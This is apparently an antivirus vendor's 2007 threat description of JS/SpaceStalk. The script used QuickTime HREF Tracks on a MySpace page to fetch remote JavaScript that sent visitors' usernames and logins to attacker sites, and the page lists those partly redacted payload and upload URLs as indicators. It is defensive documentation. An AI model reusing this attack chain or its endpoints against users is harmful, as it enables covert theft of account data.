JS/SpaceStalk

This page shows details and results of our analysis on the malware JS/SpaceStalk

Overview

The JavaScript detected as JS/SpaceStalk is executed using a known insecure feature in QuickTime called HREF Tracks. When an infected site is viewed, a hidden embedded QuickTime movie is played which takes advantage of the HREF Tracks features in QuickTime to download and execute a JavaScript file from an external site.

Information on the vulnerability which is being exploited can be found here:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0059

The script collects data about the user viewing the page and uploads it back to the author.
As the website being communicated to is normally controlled by the malware author, any script being downloaded and executed can be remotely modified and the behavior of these new scripts altered to perform further malicious actions.

Note:
This threat is proactively detected with the 4958 dats onwards.

 


Minimum DAT

4958 (2007-02-07)

Updated DAT

4958 (2007-02-07)

Minimum Engine

5400.1158

File Length

varies

Description Added

2007-02-07

Description Modified

2007-03-16

Malware Proliferation

Characteristics

-- Update March 16, 2007 --
The risk assessment of this threat has been updated to Low-Profiled due to media attention at:
http://www.theregister.co.uk/2007/03/16/myspace_quicktime_exploit/
--

The JavaScript detected as JS/SpaceStalk is executed using a known insecure feature in QuickTime called HREF Tracks.

Information on the vulnerability which is being exploited by this script can be found here:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0059

When an infected site is viewed, a hidden embedded QuickTime movie is played which takes advantage of the HREF Tracks features in QuickTime to download and execute a JavaScript file from an external site. The script collects data about the user viewing the page and uploads it back to the author.

The sample was recently noticed in the wild being hosted on the MySpace page of a French rock band. Upon visiting the site, a hidden embedded QuickTime movie is played from the following URL:

  • http://profileaware[Removed].com/tys4.mov

As the movie is played, it automatically executes a JavaScript from the URL:

  • http://profileaware[Removed].com/logs4/sqltrack.js

The executed script collects the data about visiting MySpace user and uploads it to the following sites:

  • http://stalkertrack.com/[Removed]/connect.php
  • http://profileaware[Removed].com/logs4/connect.php

Information transmitted includes:

  • MySpace Username
  • Other logins used by the same user
  • FriendID
  • Current page url
  • Referrer of current page etc.

Note: As the website being communicated is normally controlled by the malware author, any script being downloaded and executed can be remotely modified and the behavior of these new scripts altered to perform further malicious actions.

Symptoms

Upon execution, the script attempts to contact either of the following domains:

  • http://stalkert[Removed].com
  • http://profileaware[Removed].com

Method of Infection

This trojan can get installed while viewing websites hosting a malicious QuickTime movie.

Removal

A combination of the latest DATs and the Engine will be able to detect and remove this threat. AVERT recommends users not to trust seemingly familiar or safe file icons, particularly when received via P2P clients, IRC, email or other media where users can share files.

 

Variants